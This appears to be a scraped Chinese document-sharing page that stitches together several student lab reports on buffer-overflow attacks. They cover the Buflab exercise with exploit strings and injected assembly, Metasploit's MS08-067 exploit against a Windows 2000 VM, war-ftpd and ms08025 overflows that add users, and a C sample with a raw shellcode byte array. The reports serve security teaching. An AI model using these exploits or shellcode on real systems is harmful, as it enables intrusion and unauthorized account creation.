实验4 缓冲区溢出攻击实验

合集下载

缓冲区溢出攻击实验

缓冲区溢出攻击实验

HUNAN UNIVERSITY课程实验报告题目: Buflab-handout学生姓名学生学号专业班级计科1403(一)实验环境联想ThinkPadE540 VM虚拟机ubuntu32位操作系统(二)实验准备1.使用tar xvf命令解压文件后,会有3个可执行的二进制文件bufbomb,hex2raw,makecookie。

bufbomb运行时会进入getbuf函数,其中通过调用Gets函数读取字符串。

要求在已知缓冲区大小的情况下对输入的字符串进行定制完成特定溢出操作。

从给的PDF文件中我们得知getbuf函数为:/ /Buffer size for getbuf#define NORMAL_BUFFER_SIZE 32int getbuf(){char buf[NORMAL_BUFFER_SIZE];Gets(buf);return 1;}这个函数的漏洞在于宏定义的缓冲区的大小为32,若输入的字符串长于31(字符串末尾结束符)则会导致数据的覆盖,从而导致一系列损失;在此实验中,我们正是利用这个漏洞来完成实验。

2. hex2raw可执行文件就是将给定的16进制的数转成二进制字节数据。

Makecookie是产生一个userid。

输入的相应的用户名产生相应的cookie值。

**我产生的cookie值为0x5eb52e1c,如下图所示:Level0:实验要求:从英文的PDF文件中的“Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement,rather than returning to test. Note that your exploit string may also corrupt parts of the stack not directlyrelated to this stage, but this will not cause a problem, since smoke causes the program to exit directly.”这句话看出实验让我们在test运行完后,不直接退出,而是跳到smoke函数处执行然后退出,这点很重要!(本人之前一直没有成功就是错在这儿)Test源码:void test(){int val;// Put canary on stack to detect possible corruptionvolatile int local = uniqueval();val = getbuf();// Check for corrupted stackif (local != uniqueval()) {printf("Sabotaged!: the stack has been corrupted\n");}else if (val == cookie) {printf("Boom!: getbuf returned 0x%x\n", val);validate(3);} else {printf("Dud: getbuf returned 0x%x\n", val);}}smoke源码:void smoke(){printf("Smoke!: You called smoke()\n");validate(0);exit(0);}对bufbomb函数进行反汇编并获取getbuf函数的反汇编代码:从上面的汇编代码中我们可以得知,lea指令把buf的指针地址(-0x28(%ebp))传给了Gets()。

山东大学信息安全实验报告

山东大学信息安全实验报告

山东大学软件学院信息安全导论课程实验报告学号:201300301385 姓名:周强班级: 2013级八班实验题目:缓冲区溢出实验实验学时:日期:实验目的:(1)了解缓冲区溢出的原理(2)利用缓冲区溢出现象构造攻击场景(3)进一步思考如何防范基于缓冲区溢出的攻击硬件环境:软件环境:WindowsXP操作系统VS2008实验步骤与内容:(1)了解缓冲区溢出的原理缓冲区溢出简单来说就是计算机对接收的输入数据没有进行有效的检测(理情况下是程序检测数据长度并不允许输入超过缓冲区长度的字符),向缓冲区内填充数据时超过了缓冲区本身的容量,而导致数据溢出到被分配空间之外的内存空间,使得溢出的数据覆盖了其他内存空间的数据。

看一个代码实例,程序如下:void function(char *str) {char buffer[16];strcpy(buffer,str);}上面的strcpy()将直接把str中的内容copy到buffer中。

这样只要str的长度大于16,就会造成buffer的溢出,使程序运行出错。

(2)利用缓冲区溢出现象构造攻击场景首先打开Microsoft Visual C++,新建工程和cpp文件,复制实验指导书的代码进行编译连接:单击运行按钮,然后第1次输入“zhouqianga”,第2次输入2个“ga”,即可看到输出“correct”。

按F10开始进行逐步调试:当第一次执行gets()函数之前,内存情况如下图所示在最新的版本中gets被认为是不安全的,gets从标准输入设备读字符串函数。

可以无限读取,不会判断上限,以回车结束读取,所以程序员应该确保buffer的空间足够大,以便在执行读操作时不发生溢出。

现在都被要求改为get_s。

来防止溢出。

如下图所示。

(3)学习例子程序2:数据被执行在xp系统下,直接运行Exploit-1.1.exe,如下图所示:但是在计算器下输入数字后,将计算器关闭,会出现如下对话框:当程序返回时,改变了程序入口地址,让其跳转并且执行cmd.exe calc.exe两个程序(打开计算器)并执行abc.bat批处理程序。

缓冲区溢出攻击与防范实验报告

缓冲区溢出攻击与防范实验报告

实验六报告如图2所示的Windows 2000系统(虚拟机环境下)的计算机。

显然这2台计算机处于同一个网段中,可以相互通讯,win10系统用作攻击机,下面将在此系统上运行Metasploit进行渗透测试,而Windows 2000系统都是本次任务中需要进行渗透入侵的靶机,保持安装后的默认状态,没有打额外的系统安全补丁。

图1 win10攻击机图2 Windows 2000 靶机2、扫描靶机在正式开始渗透之前,应该对靶机进行扫描探测工作,搞清楚渗透目标的系统类型、开放的端口服务、可能存在的安全漏洞等。

在win10攻击机上运行metasploit console,即可进入Metasploit环境。

现在可以利用MSF框架中集成的Nmap扫描器对渗透测试目标进行扫描,如图3所示,获取了靶机的开放服务和操作系统类型等信息。

图3 windows 2000扫描结果利用扫描器的脚步插件,还有可能直接探测出目标系统的安全漏洞,例如如图4所示,Nmap 利用smb-check-vulns插件扫描探测出了Windows 2000靶机存在MS08_067漏洞,命令执行如下:nmap -script= 。

namap扫描的结果里报告发现MS08-067:DISABLED。

这是在暗示我们或许能够对这台主机进行渗透攻击,然后我们在Metasloit里面找到此漏洞的攻击模块,并尝试攻击目标机器。

MS08-067是一个对操作系统版本依赖非常高的漏洞,所以在这里,我们只自动payload指定一下目标就可以确保触发正确的溢出代码。

图4漏洞扫描结果3利用MS08_067漏洞渗透入侵MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC 请求,则该漏洞可能允许远程执行代码。

在Microsoft Windows 2000Windows XP 和Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

网络攻击与防范实验报告-缓冲区溢出

网络攻击与防范实验报告-缓冲区溢出

网络攻击与防范实验报告姓名:____王小北___ 学号:___ 201411111111111111 _ 所在班级:实验名称:缓冲区溢出实验日期:2014年11月7日指导老师:实验评分:验收评语:实验目的:1.掌握缓冲区溢出的原理2.掌握常用的缓冲区溢出方法3.理解缓冲区溢出的危害性4.掌握防范和避免缓冲区溢出攻击的方法实验工具:溢出对象:war-ftp 1.65 ( 自己分析)调试工具:Debugging Tools for Windows 中(网上有下载)实验环境:虚拟机vmware workstation 10 Windows XP sp1高级语言编程:Socket编程VS2010实验步骤:原理:war-ftp 1.65版本的一个漏洞,即向服务器发送超过480字节的用户名可以触发漏洞(即使用命令USER longString\r\n),溢出之后ESP内容包含了longString中的部分内容。

过程:攻击者向war-ftp发送多余480字节的用户名,触发war-ftpd的漏洞,产生缓冲区溢出,此时war-ftpd将出现错误。

接下来通过PatterntTool工具构造的一串不重复字符串(1000个不同字符串,存入test.txt中),通过其时eip的内容,利用patternoffset.pl工具来确定RET的位置。

在网上寻找一段具有攻击效果的Shellcode,作为所发送的war-ftpd用户名。

其最主要是通过上边所确定的RET的位置,将“JMP ESP”指令的地址(0x7ffa4512)传递到RET 位置,最终目的是将指令指针转移到esp的位置。

同时我们可以通过确定esp的位置,从而在构造字符串时直接将shellcode代码加在在用户名上,使其能直接被放入esp所指的位置,即达到将其放入esp指向的缓冲区的目的。

通过发送构造的用户名,导致war-ftpd发生缓冲区溢出。

Shellcode的功能是建立一个新用户hack,可以用过net user命令来查看用户,最后发现攻击成功。

信息安全实验-缓冲区溢出-蒋智超

信息安全实验-缓冲区溢出-蒋智超

缓冲区溢出一、实验目的掌握缓冲区溢出攻击的现象掌握使用缓冲区溢出工具的方法二、实验步骤一.利用ms06035漏洞进行攻击1.进入“ms06035漏洞利用工具”目录主机A单击工具栏中“ms06035工具”按钮,进入“ms06035漏洞利用工具”工作目录。

2.查看当前目录内容主机A用dir命令查看当前目录中的内容,如下图所示:图4-1-1 工具目录中的内容上图中标注的“ms06035.exe”即为ms06035漏洞利用工具。

3.使用“ms06035工具”进行攻击主机A执行“ms06035.exe 主机B的ip 445”命令,发起对主机B的攻击。

4.主机B观察被攻击现象主机B被攻击后出现蓝屏死机的现象(实验结束,主机B用虚拟机“快照X”恢复实验环境)。

二.利用ms08025漏洞进行攻击以下步骤两主机互相攻击对方,操作相同,故以主机A为例说明实验步骤。

「注」主机B单击“ms08025工具”按钮,进入实验目录。

将ms08025.exe复制到D盘的根目录下,以便实验下一步进行。

1.telnet登录系统(1)主机A在命令行下使用telnet登录同组主机,当出现“您将要把您的密码信息送到Internet区内的一台远程计算机上,这可能不安全,您还要发送吗(y/n)”当出现此提示时,选择n,输入登录账号“student”,密码“123456”。

登录成功如下图所示。

图4-1-2 telnet登录(2)主机A依次输入“d:”|“dir”查看同组主机D盘根目录,“ms08025.exe”即为实验工具。

图4-1-3 实验工具2.使用系统命令添加用户主机A使用“net user student1 /add”命令来试添加一个用户“student1”,执行该命令,出现“发生系统错误5,拒绝访问”的提示,如下图所示:图4-1-4 使用系统命令添加用户请解释出现上述现象的原因:。

3.查看ms08025工具使用方法主机A在telnet命令行中输入“ms08025.exe”,查看工具的使用方法,如下图所示:图4-1-5 ms08025工具使用方法4.使用ms08025工具添加用户主机A执行“ms08025.exe "net user student1 /add"”命令,提示命令成功完成,证明用户student1成功添加,如下图所示:图4-1-6 使用ms08025工具添加用户5.查看用户信息主机A用命令“net user student1”查看用户student1的信息,发现用户student1创建成功,隶属于Users组。

缓冲区溢出攻击与防范实验报告

缓冲区溢出攻击与防范实验报告

缓冲区溢出攻击与防范实验报告——计算机网络(2)班——V200748045黄香娥1·缓冲区溢出的概念:缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量溢出的数据覆盖在合法数据上,理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符,但是绝大多数程序都会假设数据长度总是与所分配的储存空间想匹配,这就为缓冲区溢出埋下隐患.操作系统所使用的缓冲区又被称为"堆栈". 在各个操作进程之间,指令会被临时储存在"堆栈"当中,"堆栈"也会出现缓冲区溢出。

2·缓冲区溢出的危害:在当前网络与分布式系统安全中,被广泛利用的50%以上都是缓冲区溢出,其中最著名的例子是1988年利用fingerd漏洞的蠕虫。

而缓冲区溢出中,最为危险的是堆栈溢出,因为入侵者可以利用堆栈溢出,在函数返回时改变返回程序的地址,让其跳转到任意地址,带来的危害一种是程序崩溃导致拒绝服务,另外一种就是跳转并且执行一段恶意代码,比如得到shell,然后为所欲为。

3·缓冲区溢出原理:由一个小程序来看://test.c#include "stdio.h"#include "stdlib.h"#include "string.h"void overflow(void){char buf[10];strcpy(buf,"0123456789123456789");}//end overflowint main(void){overflow();return 0;}//end main按F11进入"Step into"调试模式,如下:按F11跟踪进入overflow,让程序停在6,现在再看一下几个主要参数:esp=0x0012ff30,eip发生了变化,其它未变。

缓冲区溢出漏洞实验

缓冲区溢出漏洞实验

缓冲区溢出漏洞实验⼀、实验简介缓冲区溢出是指程序试图向缓冲区写⼊超出预分配固定长度数据的情况。

这⼀漏洞可以被恶意⽤户利⽤来改变程序的流控制,甚⾄执⾏代码的任意⽚段。

这⼀漏洞的出现是由于数据缓冲器和返回地址的暂时关闭,溢出会引起返回地址被重写。

原理详解:缓冲区是内存中存放数据的地⽅。

在程序试图将数据放到机器内存中的某⼀个位置的时候,因为没有⾜够的空间就会发⽣缓冲区溢出。

⽽⼈为的溢出则是有⼀定企图的,攻击者写⼀个超过缓冲区长度的字符串,植⼊到缓冲区,然后再向⼀个有限空间的缓冲区中植⼊超长的字符串,这时可能会出现两个结果:⼀是过长的字符串覆盖了相邻的存储单元,引起程序运⾏失败,严重的可导致系统崩溃;另⼀个结果就是利⽤这种漏洞可以执⾏任意指令,甚⾄可以取得系统root特级权限。

缓冲区是程序运⾏的时候机器内存中的⼀个连续块,它保存了给定类型的数据,随着动态分配变量会出现问题。

⼤多时为了不占⽤太多的内存,⼀个有动态分配变量的程序在程序运⾏时才决定给它们分配多少内存。

如果程序在动态分配缓冲区放⼊超长的数据,它就会溢出了。

⼀个缓冲区溢出程序使⽤这个溢出的数据将汇编语⾔代码放到机器的内存⾥,通常是产⽣root权限的地⽅。

仅仅单个的缓冲区溢出并不是问题的根本所在。

但如果溢出送到能够以root权限运⾏命令的区域,⼀旦运⾏这些命令,那可就等于把机器拱⼿相让了。

通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从⽽破坏程序的堆栈,进⽽运⾏精⼼准备的指令,以达到攻击的⽬的。

⼆、缓冲区溢出实例1、利⽤数组越界进⾏缓冲区溢出#include<stdio.h>void HelloWord(){printf("Hello World");getchar();}void Fun(){int arr[5] = {1,2,3,4,5};arr[6] = (int) HelloWord;}int main(){Fun();return 0;}2、利⽤strcpy()函数进⾏缓冲区溢出攻击#include "stdafx.h"#include <stdio.h>#include <string.h>char shellcode3[] = "\x68\x72\x6F\x63\x41\x68\x47\x65""\x74\x50\xE8\x41\x00\x00\x00\x50\x68\x4C\x69\x62\x72\x68\x4C\x6F""\x61\x64\xE8\x31\x00\x00\x00\x50\x68\x72\x74\x00\x00\x68\x6D\x73""\x76\x63\x54\xFF\xD0\x83\xC4\x08\x68\x65\x6D\x00\x00\x68\x73\x79""\x73\x74\x54\x50\xFF\x54\x24\x14\x83\xC4\x08\x68\x63\x6D\x64\x00""\x54\xFF\xD0\x83\xC4\x14\xEB\x67\x55\x8B\xEC\x64\xA1\x30\x00\x00""\x00\x8B\x40\x0C\x8B\x40\x14\x8B\x00\x8B\x70\x28\x80\x7E\x0C\x33""\x75\xF5\x8B\x40\x10\x8B\xF8\x03\x7F\x3C\x8B\x7F\x78\x03\xF8\x8B""\xDF\x8B\x7B\x20\x03\xF8\x33\xC9\x8B\x34\x8F\x03\xF0\x41\x8B\x54""\x24\x08\x39\x16\x75\xF2\x8B\x54\x24\x0C\x39\x56\x04\x75\xE9\x8B""\x7B\x24\x03\xF8\x8B\x0C\x4F\x81\xE1\xFF\xFF\x00\x00\x8B\x7B\x1C""\x03\xF8\x49\xC1\xE1\x02\x8B\x3C\x0F\x03\xC7\x5D\xC2\x08\x00";#pragma comment(linker, "/section:.data,RWE")void Sub_3(){__asm{mov eax, offset shellcode3jmp eax}}void overflow(const char* input){char buf[8];printf("Virtual address of 'buf' = Ox%p\n", buf);strcpy(buf, input);}void fun(){printf("Function 'fun' has been called without an explicitly invocation.\n");printf("Buffer Overflow attack succeeded!\n");}int main(){printf("Address of 'overflow' = Ox%p\n", overflow);printf("Sddress of 'fun' = Ox%p\n", fun);printf("Sddress of 'Sub3' = Ox%p\n", Sub_3);char input[] = "AAAbbbbbbaaa\xA5\x10\x41\x00";//char input[] = "AAAAAAA";overflow(input);return 0;}3、本次实验⽤的测试代码为:#include <stdio.h>int main(){char *name[2];name[0] = "/bin/sh";name[1] = NULL;execve(name[0], name, NULL);}⼀般情况下,缓冲区溢出会造成程序崩溃,在程序中,溢出的数据覆盖了返回地址。

缓冲溢出攻击实验报告

缓冲溢出攻击实验报告

一、实验目的及要求1. 了解缓冲区溢出攻击的原理和类型。

2. 掌握缓冲区溢出攻击的实验方法和步骤。

3. 理解缓冲区溢出攻击的危害性。

4. 学习防范和避免缓冲区溢出攻击的方法。

二、实验环境1. 操作系统:Windows 102. 编程语言:C/C++3. 漏洞利用工具:Metasploit4. 实验环境搭建:使用虚拟机软件(如VMware)搭建实验环境,靶机为Windows 7 SP1,攻击机为Kali Linux。

三、实验内容1. 漏洞分析:分析实验环境中存在的缓冲区溢出漏洞。

2. 攻击实现:利用Metasploit工具对靶机进行攻击,实现远程代码执行。

3. 防御措施:学习防范和避免缓冲区溢出攻击的方法。

四、实验步骤1. 漏洞分析- 使用Ghidra工具对实验环境中的漏洞程序进行反汇编,分析程序中的缓冲区溢出漏洞。

- 发现漏洞程序存在缓冲区溢出漏洞,攻击者可以通过输入超长字符串来覆盖返回地址,从而控制程序的执行流程。

2. 攻击实现- 使用Metasploit工具中的`exploit/multi/handler`模块,设置攻击目标为靶机的IP地址和端口。

- 使用`set payload`命令设置攻击载荷,选择`windows/x64/meterpreter/reverse_tcp`,该载荷可以在攻击成功后与攻击机建立反向连接。

- 使用`set LHOST`命令设置攻击机的IP地址,使用`set LPORT`命令设置端口号。

- 使用`set target`命令设置攻击目标,选择漏洞程序的模块和参数。

- 使用`exploit`命令启动攻击,等待攻击成功。

3. 防御措施- 代码审计:对程序进行代码审计,及时发现并修复缓冲区溢出漏洞。

- 输入验证:对用户输入进行严格的验证,限制输入长度,防止输入超长字符串。

- 边界检查:在代码中添加边界检查,防止缓冲区溢出。

- 安全编程:遵循安全编程规范,使用安全的编程语言和库,避免使用存在漏洞的函数。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

深圳大学实验报告课程名称:计算机系统(2)
实验项目名称:缓冲区溢出攻击实验
学院:计算机与软件学院
专业:
***师:***
报告人:学号:班级:
实验时间:2017年5月12日
实验报告提交时间:2017年5月31日
教务处制
一、实验目标:
1.理解程序函数调用中参数传递机制;
2.掌握缓冲区溢出攻击方法;
3.进一步熟练掌握GDB调试工具和objdump反汇编工具。

二、实验环境:
1.计算机(Intel CPU)
2.Linux32位操作系统(Ubuntu 16.04)
3.GDB调试工具
4.objdump反汇编工具
三、实验内容
本实验设计为一个黑客利用缓冲区溢出技术进行攻击的游戏。

我们仅给黑客(同学)提供一个二进制可执行文件bufbomb和部分函数的C代码,不提供每个关卡的源代码。

程序运行中有3个关卡,每个关卡需要用户输入正确的缓冲区内容,否则无法通过管卡!
要求同学查看各关卡的要求,运用GDB调试工具和objdump反汇编工具,通过分析汇编代码和相应的栈帧结构,通过缓冲区溢出办法在执行了getbuf()函数返回时作攻击,使之返回到各关卡要求的指定函数中。

第一关只需要返回到指定函数,第二关不仅返回到指定函数还需要为该指定函数准备好参数,最后一关要求在返回到指定函数之前执行一段汇编代码完成全局变量的修改。

实验代码bufbomb和相关工具(sendstring/makecookie)的更详细内容请参考“实验四缓冲区溢出攻击实验.pptx”。

本实验要求解决关卡1、2、3,给出实验思路,通过截图把实验过程和结果写在实验报告上。

四、实验步骤和结果
首先是makecookie:
步骤1 返回到smoke()
1.1解题思路
步骤1是要修改getbuf()的返回地址,在执行完getbuf()后不是返回到原来的调用者test(),而是跳到一个叫做smoke()的函数里。

只需构造一段字符串让Gets()全部拷贝到buf数组了,从而造成缓冲区溢出。

同时最重要的一点是:将smoke()函数的初始地址也放到构造的字符串内,使其恰好覆盖到getbuf()的return address位置。

1.2解题过程
首先要知道smoke()的初始地址,用objdump查看符号表
smoke的初始地址是0x08048eb0。

buf第一个元素的地址是-0x18,而return address 第一个字节的地址是0x04,两个位置的相差换算成十进制就是0x04 - (-0x18) = 4 + 24 = 28。

也就是说我们要构造28个字符,然后加上smoke()的地址就能准确覆盖到return address了。

1.3 最终结果截图
步骤2 返回到fizz()并准备相应参数
2.1 解题思路
通过objdump -t查看符号表中fizz()函数的初始地址。

拿到了地址0x08048e60,只要用它替换掉之前exploit.raw中smoke()的地址就能让getbuf()执行完毕后返回到fizz()中。

然后用makecookie生成我的用户名ylb。

以getbuf()调用Gets()为例,看一下调用者的代码和对应的栈。

2.2 解题过程
先分析出从getbuf()函数结束后,到调用fizz()函数前栈的情况:
0x0c 即将是fizz()栈区
0x08 即将是fizz()栈区
0x04 getbuf()的返回地址(即fizz()的地址)<- %esp
0x00 getbuf()中%ebp的保存值
得知,在返回并调用fizz()前,栈指针指向0x04处(相对getbuf()中的%ebp为0x00),随后fizz()调用时,会把fizz()的%ebp值压入栈中,
8048e66:8b 45 08 mov 0x8(%ebp),%eax
8048e69:3b 05 d4 a1 04 08 cmp 0x804a1d4,%eax
再结合这两行代码得知,fizz()函数的传入参数是应该存放在0x8(%ebp)处的,栈的情况应变为:
0x0c fizz的传入参数
0x08 fizz()的返回地址
0x04 fizz()中%ebp的保存值<- %esp (因为压栈,getbuf()的返回地址被替换)
0x00 getbuf()中%ebp的保存值01020304050607080910111213141516171819202122232425262728608e0408这串字符串刚覆盖到0x08,即还需要覆盖4个字节,然后传入黑客cookie值.
./makecookie ylb利用该命令获得个人黑客cookie值为0x239772d5
黑客cookie值依据小端法调整为96 3c df 30,cookie值前方还需覆盖4个字节,故得到完整字符串内容为:01020304050607080910111213141516171819202122232425262728608e040801020 304d57297230d
cat exploit2.txt | ./sendstring | ./bufbomb –t ylb
最后通过以上指令来把字符串内容构造并输入到bufbomb程序中。

2.3 最终结果截图
步骤3 返回到bang()且修改global_value
3.1解题思路
因为全局变量与代码不在一个段中,所以我们不能让缓冲区一直溢出到.bss段(因为global_value初始化为0,所以它会被放在.bss而非.data段以节省空间)覆盖global_value的值。

若修改了.bss和.text之间某些只读的段会引起操作系统的“警觉”而报错。

所以在进入bang()之前我们需要执行一小段我们自己的代码去修改global_value,这一段代码就叫做exploit code。

3.2解题过程
a.bang()和global_value地址
得到bang()的入口地址0x08048e10,以及global_value的地址0x0804a1c4
利用gdb调试获得buf字符数组的首地址,即是注入代码的首地址。

gdb bufbomb ;调试程序
disass getbuf ;查看getbuf的汇编代码
给getbuf()设置断点,程序把断点设置在0x8048ad6
run –t ylb ;运行程序
p $ebp-0x18 ;由lea -0x18(%ebp),%eax分析出buf地址为%ebp地址-0x18
得出buf地址,也即注入代码地址应为0xbfffb930
接下来编写注入代码(汇编代码):
.code32 ;让gcc以32位模式来编译
movl $0x333382e2, 0x0804a1c4 ; 令global_value = cookie值
pushl $0x08048e10 ; %esp -> bang入口地址
ret ; ret bang()
gcc –c exploit_code.s //编译汇编文件为可重定位文件.s -> .o objdump –d exploit_code.o //查看可重定位文件的内容
最终获得注入代码的16进制机器码,为16字节。

在第1题中返回地址前有28个字节的空间,故在注入代码后面仍需补充12个字节的空间,为方便计数定为01~12,紧接着则是buf的地址,让getbuf()返回时跳转到注入代码的首地址,按照小端法,buf地址应为30 b9 ff ff,故完整字符串为:
c7 05 c4 a1 04 08 e2 82 33 33 68 10 8e 04 08 c3 01 02 03 04 05 06 07 08 09 10 11 12 30 b9 ff bf 0d
忽略空格(和下划线)后,得到exploit3.txt的内容为:
c705c4a10408e282333368108e0408c301020304050607080910111230b9ffbf0d
Linux 内存地址有随机化机制,若随机化机制打开,那么每次运行程序,%ebp的地址可能是不一样的,即buf地址无法确定(注入代码开始地址无法确定),这样的话,注入代码将无法正确编写。

所以需要先关闭Linux 内存地址随机化机制,才能完成实验。

可以通过设置kernel.randomize_va_space内核参数来设置内存地址随机化的行为。

# echo 0 >/proc/sys/kernel/randomize_va_space
3.3 最终结果截图
将global_value的值设为0x333382e2
五、实验总结与体会
(1)在做第一题的时候,遇到了一个问题。

Error:Unable to send validation information to grading server.随后在网上查阅了相关的资料,明白了需要先安装sendmail。

执行的命令如下:
sudo apt-get install sendmail
sudo apt-get install sendmail-cf
随后问题得以解决。

(2)而第三题,遇到了一个问题。

Linux有内存地址随机化机制,因此在运行时,buf数组的首地址是不一样的,即注入代码首地址不能确定,此时,需要先关闭内存地址随机化机制,确定buf首地址后,编写注入代码,再来运行程序,才能成功。

注:1、报告内的项目或内容设置,可根据实际情况加以调整和补充。

相关文档
最新文档